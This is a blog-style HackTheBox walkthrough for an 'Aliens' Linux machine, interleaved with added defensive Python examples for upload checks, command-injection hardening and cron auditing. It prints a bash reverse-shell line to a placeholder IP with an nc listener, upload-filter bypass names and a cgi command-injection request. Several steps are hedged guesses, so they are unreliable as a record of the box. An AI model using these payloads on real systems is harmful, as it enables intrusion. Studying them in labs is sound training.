Introduction
Are you a cybersecurity enthusiast looking to sharpen your ethical hacking skills? Or maybe you’re just starting your journey on HackTheBox (HTB) and stumbled across the famous Aliens HTB machine. You’re in luck! This detailed Aliens HTB Write Up will walk you through the full step-by-step process in simple English. Whether you’re a beginner or intermediate hacker, this guide will make sure you learn while solving.
The Aliens HTB machine is known for its creative challenge that combines web exploitation, enumeration, and privilege escalation. Unlike overwhelming write-ups full of jargon, this guide breaks it down using easy language, practical explanations, and real commands. Let’s explore this exciting alien-themed box together and unlock every flag!
What Is the Aliens HTB Machine?
The Aliens box on HackTheBox is a Linux-based machine categorized under “Easy” or “Beginner” difficulty. It’s publicly retired, meaning it’s available for anyone with a free HTB account. Created for learning purposes, this box teaches vital penetration testing skills like:
- Port Scanning
- Web Enumeration
- FTP Exploitation
- Command Injection
- Privilege Escalation (Linux)
Tools You Will Need
To complete this walkthrough, you’ll need the following tools installed:
- Kali Linux or Parrot OS (Any penetration testing distro)
- nmap – Network scanner
- gobuster or dirb – For directory brute forcing
- ftp – To access open FTP ports
- python – For simple web servers
- LinPEAS or Linux Smart Enumeration – For privilege escalation
Step 1: Reconnaissance with Nmap
The very first step in any HTB box is scanning.
Nmap Scan Command:
nmap -sC -sV -oN initial.txt 10.10.10.237
Scan Output Summary:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian
80/tcp open http Apache httpd 2.4.38
- FTP is open – could allow anonymous login.
- SSH is running – probably for later use.
- HTTP is open – time to check it in the browser!
Step 2: FTP Enumeration
Try to log into FTP using anonymous credentials:
ftp 10.10.10.237
Username: anonymous
Password: [press Enter]
Success! You’re in.
Use ls to list files. Download all .txt, .jpg, or other suspicious files using get <filename>. One image called alien.jpg might be available – we’ll use that later.
Step 3: Web Enumeration (Port 80)
Visit http://10.10.10.237 in your browser. You may find a basic HTML page with alien references. Nothing clickable? Use a directory brute-force scan.
Run Gobuster:
gobuster dir -u http://10.10.10.237 -w /usr/share/wordlists/dirb/common.txt
Possible Findings:
- /images/ – might include the previously seen image
- /upload/ – potential file upload vulnerability
- /cgi-bin/ – commonly used for command injection
Step 4: Check the Upload Function
Navigate to the /upload/ page. Try uploading different file types like .php or .txt. If it blocks .php, try bypass tricks:
- Rename shell.php to shell.php.txt
- Use double extensions like shell.php.jpg
Upload the payload and observe where it lands. Try accessing it via /images/uploads/.
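Seen from the defending side, both renaming tricks in this step work only when the upload handler checks nothing but the last extension. The following is an added example, not code from the box or from the original write-up: a server-side check that rejects shell.php.jpg and shell.php.txt. The function names, the allowed-extension policy and the executable-extension list are assumptions made for the illustration.

```python
import os
import secrets

# Assumed policy for this example: which final extensions the site accepts.
ALLOWED_FINAL = {"jpg", "jpeg", "png", "gif", "txt"}
# Extensions a web server may hand to an interpreter.
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "py", "sh"}
# Leading bytes expected for each image type.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}


def check_upload(filename, data):
    """Return (accepted, reason) for an uploaded file name and its bytes."""
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith(".") or "\x00" in name:
        return False, "bad file name"
    exts = name.lower().split(".")[1:]
    if not exts:
        return False, "no extension"
    # Inspect every extension, not only the last: Apache's mod_mime can map
    # any of them to a handler, which is why shell.php.jpg is dangerous.
    if any(ext in EXECUTABLE for ext in exts):
        return False, "executable extension in name"
    if exts[-1] not in ALLOWED_FINAL:
        return False, "extension not allowed"
    signatures = MAGIC.get(exts[-1])
    if signatures and not data.startswith(signatures):
        return False, "content does not match extension"
    return True, "ok"


def stored_name(filename):
    """Discard the client-supplied name; keep only the checked final extension."""
    ext = filename.lower().rsplit(".", 1)[-1]
    return f"{secrets.token_hex(16)}.{ext}"
```

Storing accepted files outside the web root, or in a directory where script handlers are disabled, removes the remaining risk if a check is ever missed.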
Step 5: Exploiting Command Injection
Let’s try /cgi-bin/alien.cgi. This is often a vulnerable endpoint in CTFs. Use Burp Suite or curl to send payloads.
Example payload:
curl "http://10.10.10.237/cgi-bin/alien.cgi?cmd=whoami"
If you get a response, you’ve got command execution! Now, upload a reverse shell.
Payload for Bash reverse shell:
bash -i >& /dev/tcp/YOUR-IP/4444 0>&1
Start a listener:
nc -lvnp 4444
After accessing the page with the reverse shell payload, you should get a shell!
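The root cause in this step is an endpoint that treats the cmd parameter as a command line. The following is an added example, not the source of alien.cgi and not code from the original write-up: a hypothetical handler written the vulnerable way, next to a hardened form where the request can only select from fixed commands. The function names and the ACTIONS table are assumptions.

```python
import subprocess
from urllib.parse import parse_qs


def handle_vulnerable(query_string):
    """Pattern to avoid: the request value becomes a shell command line."""
    cmd = parse_qs(query_string).get("cmd", [""])[0]
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=5)
    return 200, proc.stdout


# Hardened form: the request picks a key; the argv behind it is fixed here.
ACTIONS = {
    "whoami": ["id", "-un"],
    "uptime": ["uptime"],
}


def handle_hardened(query_string):
    """Return (status, body); anything outside ACTIONS is refused."""
    values = parse_qs(query_string, keep_blank_values=True).get("cmd", [])
    if len(values) != 1 or values[0] not in ACTIONS:
        return 400, "unknown action\n"
    # No shell is involved, so ';', '|', '&' and '$()' have no special meaning.
    proc = subprocess.run(ACTIONS[values[0]], capture_output=True, text=True, timeout=5)
    return 200, proc.stdout
```

With the first handler a value such as "echo a;echo b" runs as two commands; the second handler answers 400 to the same input because it matches no key.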
Step 6: Getting the User Flag
Now that you’re inside the system, escalate to the user level:
ls /home
cd /home/aliens
cat user.txt
You’ve got the user flag!
Step 7: Privilege Escalation
Use linpeas.sh or manual checks.
Manual Checks:
- Check for SUID files:
find / -perm -4000 2>/dev/null
- Check for cron jobs:
cat /etc/crontab
Possible Exploit:
A script /opt/alien_script.sh might be running as root via cron. If you can edit it or influence it, add a reverse shell payload to gain root access.
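The cron weakness described here, a root job pointing at a script that other users can modify, can be checked for on your own systems. The following is an added example, not part of the original write-up: it reads /etc/crontab-style text, collects the paths that root entries execute, and reports any that are not owned by a trusted user or are writable by group or others. The function names and the trusted_uids parameter are assumptions.

```python
import os
import shlex
import stat


def root_cron_paths(crontab_text):
    """Yield absolute paths named by root entries of an /etc/crontab-style file."""
    for line in crontab_text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or "=" in parts[0]:
            continue  # blank line, comment, or VAR=value assignment
        n = 1 if parts[0].startswith("@") else 5  # "@reboot" or five time fields
        fields = line.split(None, n + 1)
        if len(fields) < n + 2 or fields[n] != "root":
            continue
        try:
            tokens = shlex.split(fields[n + 1])
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = fields[n + 1].split()
        for tok in tokens:
            if tok.startswith("/") and not tok.startswith("/dev/"):
                yield tok


def findings(path, trusted_uids=(0,)):
    """List reasons a non-root user could change what `path` runs."""
    reasons = []
    for p in (path, os.path.dirname(path)):
        try:
            st = os.stat(p)
        except OSError:
            reasons.append(f"{p}: missing")
            continue
        if st.st_uid not in trusted_uids:
            reasons.append(f"{p}: owned by uid {st.st_uid}")
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            reasons.append(f"{p}: writable by group/other ({stat.filemode(st.st_mode)})")
    return reasons


def audit(crontab_text, trusted_uids=(0,)):
    """Map each risky path to its findings; an empty dict means nothing flagged."""
    return {p: r for p in root_cron_paths(crontab_text) if (r := findings(p, trusted_uids))}
```

Run it as audit(open("/etc/crontab").read()); the parent directory is checked as well because a writable directory lets a user replace the script even when the file itself is locked down.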
Step 8: Root Flag
Once you escalate to root, go to the root directory:
cd /root
cat root.txt
Boom! You’ve captured the root flag.
Lessons Learned
- Enumerate thoroughly before diving into exploits.
- Always test file uploads with bypass techniques.
- Command injection vulnerabilities can be sneaky.
- Privilege escalation often hides in cron jobs or insecure scripts.
Conclusion
The Aliens HTB Write Up is a great example of how fun and educational HackTheBox machines can be. With real-world security flaws like FTP access, file upload, and command injection, this machine offers hands-on experience in a controlled environment.
Whether you’re preparing for OSCP or just learning cybersecurity, this walkthrough helps build a strong foundation. Bookmark this page and share it with your fellow HTB players. And remember, every machine is a new mystery waiting to be solved – like the secrets of the aliens themselves!
Final Thoughts
Now that you’ve completed the Aliens HTB box, it’s time to move on to the next challenge! Each CTF teaches something new, and the skills you’ve learned here — reconnaissance, enumeration, exploitation, and escalation — are the backbone of ethical hacking.
Stay curious, keep hacking ethically, and remember: it’s not just about the flags — it’s about the knowledge you gain along the way.
FAQs About Aliens HTB Write Up
🔸 What is HackTheBox?
HackTheBox is an online platform where you can practice cybersecurity by hacking virtual machines legally.
🔸 Is the Aliens machine beginner-friendly?
Yes! Aliens is labeled as an “Easy” machine and is ideal for beginners who are learning web-based attacks.
🔸 Can I do this on a free HTB account?
Absolutely. Once a box is “retired,” it’s accessible to free users.
🔸 What skills do I need before trying Aliens?
Basic knowledge of Linux, file permissions, Nmap scanning, and web exploitation will be helpful.
🔸 How do I practice privilege escalation?
Start with tools like linpeas.sh, pspy, and manually check cron jobs, SUID files, and misconfigured services.